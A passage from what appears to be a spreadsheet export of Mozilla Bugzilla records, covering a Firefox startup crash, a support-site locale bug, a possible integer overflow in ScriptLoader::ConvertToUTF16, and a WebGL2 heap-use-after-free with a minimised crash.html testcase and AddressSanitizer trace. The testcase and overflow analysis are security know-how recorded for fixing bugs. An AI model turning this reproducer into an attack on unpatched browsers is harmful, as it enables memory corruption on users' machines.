      </c>
      <c r="U4789" t="n">
        <v>0</v>
      </c>
      <c r="V4789" t="n">
        <v>30</v>
      </c>
      <c r="W4789" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is
report bp-b21e8499-5fa4-4bed-9d81-2c19f0180912.
=============================================================
Top 10 frames of crashing thread:
0 xul.dll nsSSLStatus::~nsSSLStatus security/manager/ssl/nsSSLStatus.h:34
1 xul.dll nsSSLStatus::Release security/manager/ssl/nsSSLStatus.cpp:387
2 xul.dll mozilla::psm::TransportSecurityInfo::~TransportSecurityInfo security/manager/ssl/TransportSecurityInfo.h:35
3 xul.dll mozilla::psm::TransportSecurityInfo::`scalar deleting destructor' 
4 xul.dll mozilla::psm::TransportSecurityInfo::Release security/manager/ssl/TransportSecurityInfo.cpp:50
5 xul.dll nsBinaryInputStream::ReadObject xpcom/io/nsBinaryStream.cpp:989
6 xul.dll NS_DeserializeObject netwerk/base/nsSerializationHelper.cpp:48
7 xul.dll mozilla::net::CacheEntry::GetSecurityInfo netwerk/cache2/CacheEntry.cpp:1365
8 xul.dll mozilla::net::CacheEntryHandle::GetSecurityInfo netwerk/cache2/CacheEntry.h:451
9 xul.dll mozilla::net::nsHttpChannel::OpenCacheInputStream netwerk/protocol/http/nsHttpChannel.cpp:4698
=============================================================
this startup crash signature is taking off in volume over the past hours:
https://crash-stats.mozilla.com/signature/?product=Firefox&amp;signature=nsSSLStatus%3A%3A~nsSSLStatus&amp;date=%3E%3D2018-08-29#graphs
we have users linking that to installing the latest windows updates from yesterday's windows updates which would fit timing-wise, as the signature started increasing then across multiple release channels:
https://support.mozilla.org/en-US/questions/1233386</t>
        </is>
      </c>
      <c r="X4789" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4790">
      <c r="A4790" t="n">
        <v>849121</v>
      </c>
      <c r="B4790" t="inlineStr">
        <is>
          <t>2013-03-08 00:18:10 -0800</t>
        </is>
      </c>
      <c r="C4790" t="inlineStr">
        <is>
          <t>Questions indirectly activated for locales different from activated ones (en-US, pt-BR)</t>
        </is>
      </c>
      <c r="D4790" t="inlineStr">
        <is>
          <t>2013-10-11 18:55:31 -0700</t>
        </is>
      </c>
      <c r="E4790" t="n">
        <v>1</v>
      </c>
      <c r="F4790" t="n">
        <v>1</v>
      </c>
      <c r="G4790" t="n">
        <v>5</v>
      </c>
      <c r="H4790" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4790" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J4790" t="inlineStr">
        <is>
          <t>Questions</t>
        </is>
      </c>
      <c r="K4790" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4790" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4790" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4790" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4790" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4790" t="inlineStr">
        <is>
          <t>u=user c=aaq p=1 s=2013.19</t>
        </is>
      </c>
      <c r="Q4790" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4790" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4790" t="inlineStr">
        <is>
          <t>2013Q3</t>
        </is>
      </c>
      <c r="T4790" t="n">
        <v>1</v>
      </c>
      <c r="U4790" t="n">
        <v>0</v>
      </c>
      <c r="V4790" t="n">
        <v>22</v>
      </c>
      <c r="W4790" t="inlineStr">
        <is>
          <t>Bug 827650 activated two support forums, en-US and pt-BR but it also makes localizable question strings in any locales and the UI is indeed localized once Verbatim is updated.
So currently, the Dutch, German, Italian, Chinese, Spanish, Russian, Fufula, and Japanese support forums (see https://localize.mozilla.org/projects/sumo/) are indirectly activated, either for a Google search or the Get Community Support page for some locales, although users post in the English support forum.
With more locales localized, there will be more and more non English threads in the English support forum. See https://support.mozilla.org/fr/forums/contributors/70901 that started on February 28th (the question UI has been localizable since February 20th).</t>
        </is>
      </c>
      <c r="X4790" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4791">
      <c r="A4791" t="n">
        <v>1495011</v>
      </c>
      <c r="B4791" t="inlineStr">
        <is>
          <t>2018-09-28 09:22:31 -0700</t>
        </is>
      </c>
      <c r="C4791" t="inlineStr">
        <is>
          <t>Unsafe use of CheckedInt (possible buffer overflow) in ScriptLoader::ConvertToUTF16</t>
        </is>
      </c>
      <c r="D4791" t="inlineStr">
        <is>
          <t>2024-05-30 09:48:40 -0700</t>
        </is>
      </c>
      <c r="E4791" t="n">
        <v>1</v>
      </c>
      <c r="F4791" t="n">
        <v>1</v>
      </c>
      <c r="G4791" t="n">
        <v>3</v>
      </c>
      <c r="H4791" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4791" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4791" t="inlineStr">
        <is>
          <t>Internationalization</t>
        </is>
      </c>
      <c r="K4791" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4791" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4791" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4791" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4791" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4791" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main63+][adv-esr60.3+]</t>
        </is>
      </c>
      <c r="Q4791" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4791" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4791" t="inlineStr">
        <is>
          <t>mozilla64</t>
        </is>
      </c>
      <c r="T4791" t="n">
        <v>1</v>
      </c>
      <c r="U4791" t="n">
        <v>0</v>
      </c>
      <c r="V4791" t="n">
        <v>14</v>
      </c>
      <c r="W4791" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0
Build ID: 20100101
Steps to reproduce:
The issue is in ScriptLoader::ConvertToUTF16 (https://searchfox.org/mozilla-central/source/dom/script/ScriptLoader.cpp) :
  CheckedInt&lt;size_t&gt; unicodeLength =
    unicodeDecoder-&gt;MaxUTF16BufferLength(aLength);
  if (!unicodeLength.isValid()) {
    return NS_ERROR_OUT_OF_MEMORY;
  }
  aBufOut =
    static_cast&lt;char16_t*&gt;(js_malloc(unicodeLength.value() * sizeof(char16_t)));
  if (!aBufOut) {
    aLengthOut = 0;
    return NS_ERROR_OUT_OF_MEMORY;
  }
At line 2826, unicodeLength is calculated and sanitized against an integer overflow via the CheckedInt class. However just a few lines below, the raw value of unicodeLength (unicodeLength.value()) is multiplied by 2 (=sizeof(char16_t)) and thus can cause an overflow! In such case js_malloc will allocate a smaller buffer than required, will all the usual arbitrary out-of-bounds write consequences.
It's not clear whether any checks in the (multiple) callers sanitize away the overflow window, however the fact that this code uses the CheckedInt class strongly suggests that either it has overflowed in the past, or it has a potential for the overflow.
I checked the crash stats and they do contain quite a few bugs around this code, but maybe not all of them due to this specific issue.</t>
        </is>
      </c>
      <c r="X4791" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4792">
      <c r="A4792" t="n">
        <v>1444086</v>
      </c>
      <c r="B4792" t="inlineStr">
        <is>
          <t>2018-03-08 06:45:46 -0800</t>
        </is>
      </c>
      <c r="C4792" t="inlineStr">
        <is>
          <t>heap-use-after-free in mozilla::WebGLContext::DrawElementsInstanced</t>
        </is>
      </c>
      <c r="D4792" t="inlineStr">
        <is>
          <t>2024-05-30 09:43:43 -0700</t>
        </is>
      </c>
      <c r="E4792" t="n">
        <v>1</v>
      </c>
      <c r="F4792" t="n">
        <v>1</v>
      </c>
      <c r="G4792" t="n">
        <v>3</v>
      </c>
      <c r="H4792" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4792" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4792" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K4792" t="inlineStr">
        <is>
          <t>60 Branch</t>
        </is>
      </c>
      <c r="L4792" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4792" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4792" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4792" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4792" t="inlineStr">
        <is>
          <t>[gfx-noted][adv-main60+]</t>
        </is>
      </c>
      <c r="Q4792" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4792" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4792" t="inlineStr">
        <is>
          <t>mozilla61</t>
        </is>
      </c>
      <c r="T4792" t="n">
        <v>1</v>
      </c>
      <c r="U4792" t="n">
        <v>0</v>
      </c>
      <c r="V4792" t="n">
        <v>14</v>
      </c>
      <c r="W4792" t="inlineStr">
        <is>
          <t>Created attachment 8957159
crash.html (minimised testcase)
The following testcase crashes the latest ASAN build of Firefox 60.0a1 (SourceStamp=a6a32fb286fa9e5d5f6d5b3b77423ab6b96c9502).
crash.html:
&lt;script&gt;
	o935=document.createElementNS('http://www.w3.org/1999/xhtml','canvas');
	o935.getContext('webgl2',{depth: true,stencil: true,antialias: true,premultipliedAlpha: false,preserveDrawingBuffer: true,failIfMajorPerformanceCaveat: false,});
	o935.setAttribute('height','3');
	o2819=o935.getContext('webgl2',{stencil: false,preserveDrawingBuffer: true,failIfMajorPerformanceCaveat: true,});
	o3250=o2819.createBuffer();
	o2819.bindBuffer(o2819.PIXEL_UNPACK_BUFFER,o3250);
	o3623=o2819.createTexture();
	o2819.bindTexture(o2819.TEXTURE_2D,o3623);
	o2819.copyTexImage2D(o2819.TEXTURE_2D,2,o2819.RGBA,1,4,8,7,0);
	o935.setAttribute('height','9');
	o2819.drawElements(o2819.LINE_STRIP,0,o2819.UNSIGNED_BYTE,10);
&lt;/script&gt;
ASAN output:
=================================================================
==21389==ERROR: AddressSanitizer: heap-use-after-free on address 0x61e0000504a9 at pc 0x7fc1d0dec464 bp 0x7fff6f759b50 sp 0x7fff6f759b48
WRITE of size 1 at 0x61e0000504a9 thread T0 (file:// Content)
    #0 0x7fc1d0dec463 in ~TlsScope /builds/worker/workspace/build/src/gfx/gl/GLContext.h:216:35
    #1 0x7fc1d0dec463 in mozilla::WebGLContext::DrawElementsInstanced(unsigned int, int, unsigned int, long, int, char const*) /builds/worker/workspace/build/src/dom/canvas/WebGLContextDraw.cpp:721
    #2 0x7fc1cfccc036 in DrawElements /builds/worker/workspace/build/src/dom/canvas/WebGLContext.h:1329:9
    #3 0x7fc1cfccc036 in mozilla::dom::WebGL2RenderingContextBinding::drawElements(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::WebGL2Context*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/WebGL2RenderingContextBinding.cpp:10939
    #4 0x7fc1d0bf92b1 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3031:13
    #5 0x7fc1d76e46c8 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:290:15
    #6 0x7fc1d76e46c8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:467
    #7 0x7fc1d76ca2f9 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:522:12
    #8 0x7fc1d76ca2f9 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3085
    #9 0x7fc1d76b638a in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:417:12
    #10 0x7fc1d76e76c4 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::AbstractFramePtr, JS::Value*) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:700:15
    #11 0x7fc1d76e7e4f in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:732:12
    #12 0x7fc1d81d7129 in ExecuteScript(JSContext*, JS::AutoVector&lt;JSObject*&gt;&amp;, JS::Handle&lt;JSScript*&gt;, JS::Value*) /builds/worker/workspace/build/src/js/src/jsapi.cpp:4748:12
    #13 0x7fc1ce4b6836 in nsJSUtils::ExecutionContext::CompileAndExec(JS::CompileOptions&amp;, JS::SourceBufferHolder&amp;, JS::MutableHandle&lt;JSScript*&gt;) /builds/worker/workspace/build/src/dom/base/nsJSUtils.cpp:266:8
    #14 0x7fc1d2d14a74 in mozilla::dom::ScriptLoader::EvaluateScript(mozilla::dom::ScriptLoadRequest*) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:2321:25
    #15 0x7fc1d2d0e4b9 in mozilla::dom::ScriptLoader::ProcessRequest(mozilla::dom::ScriptLoadRequest*) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:1950:10
    #16 0x7fc1d2d0b8e7 in mozilla::dom::ScriptLoader::ProcessInlineScript(nsIScriptElement*, mozilla::dom::ScriptKind) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:1591:10
    #17 0x7fc1d2ceea7e in mozilla::dom::ScriptLoader::ProcessScriptElement(nsIScriptElement*) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:1310:10
    #18 0x7fc1d2cedb99 in mozilla::dom::ScriptElement::MaybeProcessScript() /builds/worker/workspace/build/src/dom/script/ScriptElement.cpp:141:18
    #19 0x7fc1cd26a87b in AttemptToExecute /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIScriptElement.h:247:18
    #20 0x7fc1cd26a87b in nsHtml5TreeOpExecutor::RunScript(nsIContent*) /builds/worker/workspace/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:736
    #21 0x7fc1cd263d74 in nsHtml5TreeOpExecutor::RunFlushLoop() /builds/worker/workspace/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:540:7
    #22 0x7fc1cd26fc6b in nsHtml5ExecutorFlusher::Run() /builds/worker/workspace/build/src/parser/html/nsHtml5StreamParser.cpp:131:20
    #23 0x7fc1cb2fd320 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:413:25
    #24 0x7fc1cb326ae6 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1040:14
    #25 0x7fc1cb342080 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:517:10
    #26 0x7fc1cc1f552a in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #27 0x7fc1cc147389 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #28 0x7fc1cc147389 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #29 0x7fc1cc147389 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #30 0x7fc1d2f5811a in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:157:27
    #31 0x7fc1d7415bfb in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:892:22
    #32 0x7fc1cc147389 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #33 0x7fc1cc147389 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #34 0x7fc1cc147389 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #35 0x7fc1d74155da in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:718:34
    #36 0x4f1875 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:50:30
    #37 0x4f1875 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
    #38 0x7fc1ea9c182f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #39 0x420f48 in _start (/fuzzer3/firefox/firefox+0x420f48)
0x61e0000504a9 is located 41 bytes inside of 2744-byte region [0x61e000050480,0x61e000050f38)
freed by thread T0 (file:// Content) here:
    #0 0x4c1952 in __interceptor_free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:68:3
    #1 0x7fc1d0dcf5f9 in ForceLoseContext /builds/worker/workspace/build/src/dom/canvas/WebGLContext.cpp:1883:5
    #2 0x7fc1d0dcf5f9 in mozilla::WebGLContext::EnsureDefaultFB(char const*) /builds/worker/workspace/build/src/dom/canvas/WebGLContext.cpp:785
    #3 0x7fc1d0daed2e in ValidateAndInitFB /builds/worker/workspace/build/src/dom/canvas/WebGLContext.cpp:1983:10
    #4 0x7fc1d0daed2e in mozilla::WebGLContext::BindCurFBForDraw(char const*) /builds/worker/workspace/build/src/dom/canvas/WebGLContext.cpp:2009
    #5 0x7fc1d0de939b in mozilla::ScopedDrawHelper::ScopedDrawHelper(mozilla::WebGLContext*, char const*, unsigned int, mozilla::Maybe&lt;unsigned int&gt; const&amp;, unsigned int, bool*) /builds/worker/workspace/build/src/dom/canvas/WebGLContextDraw.cpp:246:22
    #6 0x7fc1d0deb960 in mozilla::WebGLContext::DrawElementsInstanced(unsigned int, int, unsigned int, long, int, char const*) /builds/worker/workspace/build/src/dom/canvas/WebGLContextDraw.cpp:683:28
    #7 0x7fc1cfccc036 in DrawElements /builds/worker/workspace/build/src/dom/canvas/WebGLContext.h:1329:9
    #8 0x7fc1cfccc036 in mozilla::dom::WebGL2RenderingContextBinding::drawElements(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::WebGL2Context*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/WebGL2RenderingContextBinding.cpp:10939
    #9 0x7fc1d0bf92b1 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3031:13
    #10 0x7fc1d76e46c8 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:290:15
    #11 0x7fc1d76e46c8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:467
    #12 0x7fc1d76ca2f9 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:522:12
    #13 0x7fc1d76ca2f9 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3085
    #14 0x7fc1d76b638a in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:417:12
    #15 0x7fc1d76e76c4 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::AbstractFramePtr, JS::Value*) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:700:15
    #16 0x7fc1d76e7e4f in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:732:12
    #17 0x7fc1d81d7129 in ExecuteScript(JSContext*, JS::AutoVector&lt;JSObject*&gt;&amp;, JS::Handle&lt;JSScript*&gt;, JS::Value*) /builds/worker/workspace/build/src/js/src/jsapi.cpp:4748:12
    #18 0x7fc1ce4b6836 in nsJSUtils::ExecutionContext::CompileAndExec(JS::CompileOptions&amp;, JS::SourceBufferHolder&amp;, JS::MutableHandle&lt;JSScript*&gt;) /builds/worker/workspace/build/src/dom/base/nsJSUtils.cpp:266:8
    #19 0x7fc1d2d14a74 in mozilla::dom::ScriptLoader::EvaluateScript(mozilla::dom::ScriptLoadRequest*) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:2321:25
    #20 0x7fc1d2d0e4b9 in mozilla::dom::ScriptLoader::ProcessRequest(mozilla::dom::ScriptLoadRequest*) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:1950:10
    #21 0x7fc1d2d0b8e7 in mozilla::dom::ScriptLoader::ProcessInlineScript(nsIScriptElement*, mozilla::dom::ScriptKind) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:1591:10
    #22 0x7fc1d2ceea7e in mozilla::dom::ScriptLoader::ProcessScriptElement(nsIScriptElement*) /builds/worker/workspace/build/src/dom/script/ScriptLoader.cpp:1310:10
    #23 0x7fc1d2cedb99 in mozilla::dom::ScriptElement::MaybeProcessScript() /builds/worker/workspace/build/src/dom/script/ScriptElement.cpp:141:18
    #24 0x7fc1cd26a87b in AttemptToExecute /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIScriptElement.h:247:18
    #25 0x7fc1cd26a87b in nsHtml5TreeOpExecutor::RunScript(nsIContent*) /builds/worker/workspace/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:736
    #26 0x7fc1cd263d74 in nsHtml5TreeOpExecutor::RunFlushLoop() /builds/worker/workspace/build/src/parser/html/nsHtml5TreeOpExecutor.cpp:540:7
    #27 0x7fc1cd26fc6b in nsHtml5ExecutorFlusher::Run() /builds/worker/workspace/build/src/parser/html/nsHtml5StreamParser.cpp:131:20
    #28 0x7fc1cb2fd320 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:413:25
    #29 0x7fc1cb326ae6 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1040:14
    #30 0x7fc1cb342080 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:517:10
    #31 0x7fc1cc1f552a in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #32 0x7fc1cc147389 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #33 0x7fc1cc147389 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #34 0x7fc1cc147389 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #35 0x7fc1d2f5811a in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:157:27
    #36 0x7fc1d7415bfb in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:892:22
    #37 0x7fc1cc147389 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #38 0x7fc1cc147389 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #39 0x7fc1cc147389 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
previously allocated by thread T0 (file:// Content) here:
    #0 0x4c1c93 in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:88:3
    #1 0x4f26fd in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:70:17
    #2 0x7fc1cd4e0ca0 in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:156:12
    #3 0x7fc1cd4e0ca0 in mozilla::gl::GLContextGLX::CreateGLContext(mozilla::gl::CreateContextFlags, mozilla::gl::SurfaceCaps const&amp;, bool, _XDisplay*, unsigned long, __GLXFBConfigRec*, bool, gfxXlibSurface*) /builds/worker/workspace/build/src/gfx/gl/GLContextProviderGLX.cpp:546
    #4 0x7fc1cd4e3732 in mozilla::gl::CreateOffscreenPixmapContext(mozilla::gl::CreateContextFlags, mozilla::gfx::IntSizeTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gl::SurfaceCaps const&amp;, nsTSubstring&lt;char&gt;*) /builds/worker/workspace/build/src/gfx/gl/GLContextProviderGLX.cpp:1007:12
    #5 0x7fc1cd4e3abd in mozilla::gl::GLContextProviderGLX::CreateOffscreen(mozilla::gfx::IntSizeTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, mozilla::gl::SurfaceCaps const&amp;, mozilla::gl::CreateContextFlags, nsTSubstring&lt;char&gt;*) /builds/worker/workspace/build/src/gfx/gl/GLContextProviderGLX.cpp:1034:10
    #6 0x7fc1d0dce6d5 in mozilla::CreateGLWithDefault(mozilla::gl::SurfaceCaps const&amp;, mozilla::gl::CreateContextFlags, mozilla::WebGLContext*, std::vector&lt;mozilla::WebGLContext::FailureReason, std::allocator&lt;mozilla::WebGLContext::FailureReason&gt; &gt;*) /builds/worker/workspace/build/src/dom/canvas/WebGLContext.cpp:565:28
    #7 0x7fc1d0dcac7f in mozilla::WebGLContext::CreateAndInitGLWith(already_AddRefed&lt;mozilla::gl::GLContext&gt; (*)(mozilla::gl::SurfaceCaps const&amp;, mozilla::gl::CreateContextFlags, mozilla::WebGLContext*, std::vector&lt;mozilla::WebGLContext::FailureReason, std::allocator&lt;mozilla::WebGLContext::FailureReason&gt; &gt;*), mozilla::gl::SurfaceCaps const&amp;, mozilla::gl::CreateContextFlags, std::vector&lt;mozilla::WebGLContext::FailureReason, std::allocator&lt;mozilla::WebGLContext::FailureReason&gt; &gt;*) /builds/worker/workspace/build/src/dom/canvas/WebGLContext.cpp:597:23
    #8 0x7fc1d0dcced4 in mozilla::WebGLContext::CreateAndInitGL(bool, std::vector&lt;mozilla::WebGLContext::FailureReason, std::allocator&lt;mozilla::WebGLContext::FailureReason&gt; &gt;*) /builds/worker/workspace/build/src/dom/canvas/WebGLContext.cpp:724:13
    #9 0x7fc1d0dd0d32 in mozilla::WebGLContext::SetDimensions(int, int) /builds/worker/workspace/build/src/dom/canvas/WebGLContext.cpp:961:10
    #10 0x7fc1d0d1aa0e in mozilla::dom::CanvasRenderingContextHelper::UpdateContext(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/canvas/CanvasRenderingContextHelper.cpp:243:24
    #11 0x7fc1d0d1a4ba in mozilla::dom::CanvasRenderingContextHelper::GetContext(JSContext*, nsTSubstring&lt;char16_t&gt; const&amp;, JS::Handle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/canvas/CanvasRenderingContextHelper.cpp:197:19
    #12 0x7fc1d15241d0 in mozilla::dom::HTMLCanvasElement::GetContext(JSContext*, nsTSubstring&lt;char16_t&gt; const&amp;, JS::Handle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/html/HTMLCanvasElement.cpp:1016:40
    #13 0x7fc1d0646a50 in mozilla::dom::HTMLCanvasElementBinding::getContext(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::HTMLCanvasElement*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLCanvasElementBinding.cpp:275:49
    #14 0x7fc1d0bf92b1 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3031:13
    #15 0x7fc1d76e46c8 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:290:15
    #16 0x7fc1d76e46c8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:467
    #17 0x7fc1d76ca2f9 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:522:12
    #18 0x7fc1d76ca2f9 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3085
    #19 0x7fc1d76b638a in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:417:12
    #20 0x7fc1d76e76c4 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::AbstractFramePtr, JS::Value*) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:700:15
    #21 0x7fc1d76e7e4f in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:732:12
    #22 0x7fc1d81d7129 in ExecuteScript(JSContext*, JS::AutoVector&lt;JSObject*&gt;&amp;, JS::Handle&lt;JSScript*&gt;, JS::Value*) /builds/worker/workspace/build/src/js/src/jsapi.cpp:4748:12
